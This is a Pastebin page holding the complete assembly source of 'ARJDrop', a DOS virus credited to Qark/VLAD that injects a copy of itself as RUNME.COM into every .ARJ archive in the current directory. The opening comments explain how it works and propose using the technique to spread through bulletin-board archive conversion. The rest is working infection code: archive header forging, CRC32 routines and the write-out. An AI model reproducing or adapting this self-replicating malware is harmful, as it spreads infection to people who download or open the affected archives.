Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ; ARJDrop by Qark/VLAD
- ;
- ; When this virus is run it will search the current directory for any .ARJ
- ; archives. If it finds one, it copies itself into the archive, naming
- ; itself a file called RUNME.COM. It marks the archive as infected by
- ; setting the seconds field to 0. The RUNME.COM does exactly the same
- ; thing etc. So, it's like a companion archive infector. No, that doesn't
- ; sound right, maybe, just a nuisance trojan ? Anyway, it's too stupid
- ; to actually infect anywhere.
- ;
- ; This technique could be used very effectively in a serious virus that
- ; does COM/EXE as well. A lot of BBS's have a flaw in their security where
- ; their archive conversion isn't pathed, so if you put PKZIP.COM in a .ARJ
- ; file it will be executed, and vice versa. Using SCAN.COM and DOS utilities
- ; is a very effective use for this technique.
- ;
- ; If this was a resident virus on a BBS, every single archive anyone
- ; downloaded would have little RUNME.COMs inside.
- ;
- mov ah,4eh
- nextarj:
- mov cx,3
- mov dx,offset wildarj
- int 21h
- jnc openarc
- int 20h
- openarc:
- mov ax,3d02h
- mov dx,9eh
- int 21h
- mov bx,ax
- mov ax,5700h
- int 21h
- mov word ptr time,cx
- mov word ptr date,dx
- and cx,1fh
- or cx,cx
- jnz notinfected
- mov ah,3eh
- int 21h
- mov ah,4fh
- jmp nextarj
- notinfected:
- call infectarj
- mov ax,5701h
- mov cx,word ptr time
- and cx,0ffe0h
- mov dx,word ptr date
- int 21h
- mov ah,3eh
- int 21h
- int 20h
- wildarj db "*.ARJ",0
- time dw 0
- date dw 0
- db "ARJDrop by Qark/VLAD"
- infectarj proc near
- ;on entry bx=file handle
- push ds
- push es
- push cs
- pop ds
- push cs
- pop es
- mov ax,4202h
- xor cx,cx
- cwd
- int 21h
- sub ax,4
- sbb dx,0
- mov cx,dx
- mov dx,ax
- mov ax,4200h
- int 21h
- mov word ptr csize,offset rend - 100h
- mov word ptr osize,offset rend - 100h
- mov cx,offset rend - 100h
- mov si,100h ;start of program in memory
- call crc32
- cld
- mov si,offset marker
- mov di,offset sparebuff
- mov cx,offset rend - offset marker
- rep movsb
- mov word ptr crc,ax
- mov word ptr crc+2,dx
- mov cx,word ptr bhsize
- mov si,offset fhsize
- call crc32
- mov word ptr acrc,ax
- mov word ptr acrc+2,dx
- mov ah,40h
- mov cx,offset fdata - offset marker
- mov dx,offset marker
- int 21h
- mov ah,40h
- mov cx,offset marker - 100h
- mov dx,100h
- int 21h
- mov ah,40h
- mov cx,offset rend - offset marker
- mov dx,offset sparebuff
- int 21h
- mov ah,40h
- mov cx,4
- mov dx,offset fdend
- int 21h
- pop es
- pop ds
- ret
- infectarj endp
- crc32 proc near
- ;on entry cx=number of bytes to checksum
- ; si=pointer to bytes
- ;on exit dx:ax contains the checksum
- ;I stole this code from some PD sources I got off a BBS.
- push bx
- push cx
- push si
- push di
- call gentable
- mov dx,-1
- mov ax,-1
- crc32loop:
- xor bx,bx
- mov bl,byte ptr [si]
- inc si
- xor bl,al
- shl bx,1
- shl bx,1
- mov al,ah
- mov ah,dl
- mov dl,dh
- xor dh,dh
- xor ax,word ptr [bx+crc32tab]
- xor dx,word ptr [bx+crc32tab+2]
- dec cx
- jnz crc32loop
- pop di
- pop si
- pop cx
- pop bx
- xor dx,-1
- xor ax,-1
- ret
- crc32 endp
- Gentable proc near
- ;Generates the 32bit crc table. Thanks to "Necrosoft Enterprises" who had
- ;this code inside their Dementia Virus. I have plenty of other code to do
- ;this, but it is all much, much bigger.
- push ax
- push cx
- push dx
- push di
- mov di,offset crc32tab
- xor cx,cx
- outgen:
- xor dx,dx
- xor ax,ax
- mov al,cl
- push cx
- mov cx,8
- calcloop:
- clc
- rcr dx,1
- rcr ax,1
- jnc nocrcxor
- xor dx,0edb8h
- xor ax,8320h
- nocrcxor:
- loop calcloop
- mov word ptr [di],ax
- mov word ptr [di+2],dx
- add di,4
- pop cx
- inc cx
- cmp cx,100h
- jne outgen
- pop di
- pop dx
- pop cx
- pop ax
- ret
- Gentable endp
- rbuff:
- marker db 60h,0eah
- bhsize dw offset acrc - offset fhsize
- fhsize db offset aname - offset fhsize
- anum db 6
- anum2 db 1
- osver db 0
- aflag db 0
- ameth db 0 ;stored
- aftype db 0 ;binary
- ares db 0
- dtm dd 0
- csize dd 4 ;compressed size
- osize dd 4 ;original size
- crc dd 0
- fspec dw 0
- faccess dw 2
- hstdata dw 0
- aname db "RUNME.COM",0
- acomm db 0
- acrc dd 0
- ehsize dw 0
- fdata db "!"
- fdend:
- db 60h,0eah,0,0
- rend:
- crc32tab db 100h*4 dup (0)
- sparebuff:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement